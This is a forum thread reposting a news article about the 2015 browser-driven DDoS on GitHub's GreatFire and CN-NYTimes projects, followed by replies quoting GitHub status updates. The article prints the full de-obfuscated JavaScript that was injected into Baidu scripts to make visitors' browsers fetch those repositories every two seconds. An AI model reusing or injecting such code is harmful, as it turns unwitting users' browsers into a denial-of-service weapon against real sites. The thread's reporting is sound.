Jump to content

The injected JavaScript used to smash anti-Great Firewall of China projects offline


Reefa

Recommended Posts

GitHub's servers are being hammered by web traffic from an army of unwitting cyber-foot-soldiers.

It appears when thousands of people visit websites that serve ads and tracking code from Baidu – China's answer to Google – from outside the Middle Kingdom, network gateways on the Chinese border silently inject a JavaScript function into those websites' pages.

This simple code instructs browsers to stealthily connect to GitHub.com every two seconds, creating "an extremely large amount of traffic," the San Francisco-based upstart said.

The JS specifically targets two GitHub-hosted proj

ects – Greatfire and CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of China. The firewall blocks things like VPNs and censors web traffic, hiding information on the Tiananmen Square massacre and so on.

GitHub said on Friday that the bursts in traffic, effectively a string of distributed denial-of-service attacks, are causing intermittent outages.

"We're aware that GitHub.com is intermittently unavailable for some users during the ongoing DDoS," GitHub said in a status update at 1549 UTC today.

"Restoring service for all users while deflecting attack traffic is our number one priority. We've deployed our volumetric attack defenses against an extremely large amount of traffic. Performance is stabilizing."

Hours earlier, the biz noted: "We've been under continuous DDoS attack for 24+ hours. The attack is evolving, and we're all hands on deck mitigating."

github_china_ddos.png

The outage ... GitHub's status updates today

According to a security researcher at Insight Labs, HTTP requests to hm.baidu.com/h.js are being hijacked by China's border gateways, which insert some semi-obfuscated JavaScript to attack the aforementioned GitHub repositories. The injected script looks like this, once unscrambled:

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[\x3c/script>");!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");startime = (new Date).getTime();var count = 0;function unixtime() {    var a = new Date;    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3}url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];NUM = url_array.length;function r_send2() {    var a = unixtime() % NUM;    get(url_array[a])}function get(a) {    var b;    $.ajax({        url: a,        dataType: "script",        timeout: 1E4,        cache: !0,        beforeSend: function() {            requestTime = (new Date).getTime()        },        complete: function() {            responseTime = (new Date).getTime();            b = Math.floor(responseTime - requestTime);            3E5 > responseTime - startime && (r_send(b), count += 1)        }    })}function r_send(a) {    setTimeout("r_send2()", a)}setTimeout("r_send2()", 2E3);

The Greatfire project provides links to cloud-hosted mirrors of websites – such as the BBC and Google's Blogger – that Chinese people can use to dodge the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the New York Times.

"A certain device at the border of China's inner network and the Internet has hijacked the HTTP connections went into China, replaced some javascript files from Baidu with malicious ones that would load [the GitHub pages] every two seconds," Insight Labs' Anthr@x wrote.

"In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech."

While there is no proof that the Chinese government was directly involved in the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that someone, state or otherwise, wants these projects silenced.

http://www.theregister.co.uk/2015/03/27/github_under_fire_from_weaponized_great_firewall/
Link to comment
Share on other sites


  • Replies 8
  • Views 2.2k
  • Created
  • Last Reply

https://status.github.com/

2:30 UTC The ongoing DDoS attack has shifted to include Pages and assets. We are updating our defenses to match.

Cheers for the update on the story mate. ;)

Link to comment
Share on other sites


Large Scale DDoS Attack on github.com

jnewland

We are currently experiencing the largest DDoS (distributed denial of service) attack in github.com's history. The attack began around 2AM UTC on Thursday, March 26, and involves a wide combination of attack vectors. These include every vector we've seen in previous attacks as well as some sophisticated new techniques that use the web browsers of unsuspecting, uninvolved people to flood github.com with high levels of traffic. Based on reports we've received, we believe the intent of this attack is to convince us to remove a specific class of content.

We are completely focused on mitigating this attack. Our top priority is making sure github.com is available to all our users while deflecting malicious traffic. Please watch our status site or follow @githubstatus on Twitter for real-time updates.

Link to comment
Share on other sites


10:53 UTC Services are stable as we continue to mitigate against a large scale DDoS attack.
Link to comment
Share on other sites


19:25 UTC We've adjusted our mitigation tactics and are observing improved TCP performance for the majority of non-attack traffic.
Link to comment
Share on other sites


The code is actually very simple, and JavaScript 101 person could write something of similar function.

Just a loop via setTimeout to suck down the URL via Web Request.

The real alarming this here, is if you pull and code at all from China, you are vulnerable to their Government tampering with it. I'm sure most nations have this capability, but this is confirmed fact that the Chinese government uses us as DDOS pawns.

Good thing I use stuff like uBlock, no crappy ad injection code from any country in my browser.

Link to comment
Share on other sites


Today
6:46 UTC The DDoS attack has evolved and we are working to mitigate.
0:38 UTC All systems reporting at 100%. Attack traffic continues, so we remain on high alert.
Link to comment
Share on other sites


Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...